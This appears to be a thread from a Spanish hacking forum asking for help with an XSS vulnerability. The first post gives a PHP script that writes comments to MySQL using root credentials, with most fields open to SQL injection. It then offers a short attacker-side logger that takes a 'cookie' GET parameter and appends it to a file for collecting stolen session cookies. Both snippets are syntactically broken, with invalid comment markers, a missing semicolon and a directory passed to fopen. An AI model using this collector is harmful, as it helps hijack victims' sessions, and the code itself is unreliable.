Resultados 1 al 20 de 33

ayuda con vulnerabilidad xss

Vista híbrida

Mensaje anterior Mensaje anterior   Próximo mensaje Próximo mensaje
  1. #1  
    Avanzado
    Fecha de ingreso
    Oct 2010
    Mensajes
    401
    Descargas
    24
    Uploads
    0
    <?

    if (!$coment){

    echo "no se a insertado nada orangutan";
    exit;
    }

    $coment = addslashes($coment); \\ filtramos caracteres especiales

    $db = mysql_pconnect("127.0.0.1", "root", "root"); \\ conectamos

    if (!$db)
    {
    echo "Error: No se puede conectar a la base de datos. Por favor inténtalo de nuevo.";
    exit;
    }

    mysql_select_db("datos"); \\ cojemos la base de datos

    \\ query variable que guarda la peticion

    $query = "insert into comentarios values ('".$indiceid."','".$nombre."' ,'".$mai."', '".$coment."')"; \\ comando sql int comentarios \\tabla. values \\ valores indice autoincrement \\ nombre \\ mail \\ comentario

    $result = mysql_query($query); \\ peticion

    if ($result==FALSE) {
    echo "Te jodes fracasado";
    }


    ?>
    Es mucho mas dificil porque tienes que tener mas conocimientos no solo con saber php, si no que tambien deves de saber Crear bases de datos, y comandos sql (casi nada e)


    En cambio solo tratando con archivos txt me parece mucho mas sencillo

    $directorio="C:\"
    $cookie = $_GET['cookie'];
    $fp = fopen($directorio,"a"); \\ en 3 lineas
    fwrite($fp,$cookie);
    fclose($fp);
    Y eso por no hablar de las race conditions y de lo lenta que se hace la navegación por un archivo cuando ya se ha alcanzado cierto número de líneas.
    Ya pero estamos hablando de guardar una cookie, no vamos hacer una pagina web segura y rapida.
     

  2. #2  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    Cita Iniciado por chewarrior Ver mensaje
    Ya pero estamos hablando de guardar una cookie, no vamos hacer una pagina web segura y rapida.
    ¿Siendo atacante no quieres asegurar tu página? Me sé de uno de por aquí que tuvo una muy buena experiencia con algo similar. No daré nombres, él sabe de qué hablo
     

Temas similares

  1. ayuda con vulnerabilidad
    Por TYLER-_- en el foro VULNERABILIDADES
    Respuestas: 6
    Último mensaje: 02-11-2008, 23:27
  2. Nueva vulnerabilidad en el sistema de ayuda de Windows
    Por LUK en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 10-04-2004, 15:21
  3. Vulnerabilidad en HP-UX 10.20, 11.00 y 11.11
    Por |RooT| en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 25-02-2003, 11:58
  4. Vulnerabilidad CGI
    Por Rojodos en el foro GENERAL
    Respuestas: 0
    Último mensaje: 03-09-2002, 12:42
  5. Vulnerabilidad...PHP
    Por NeoGenessis en el foro HACK HiSPANO
    Respuestas: 0
    Último mensaje: 01-03-2002, 18:32

Marcadores

Marcadores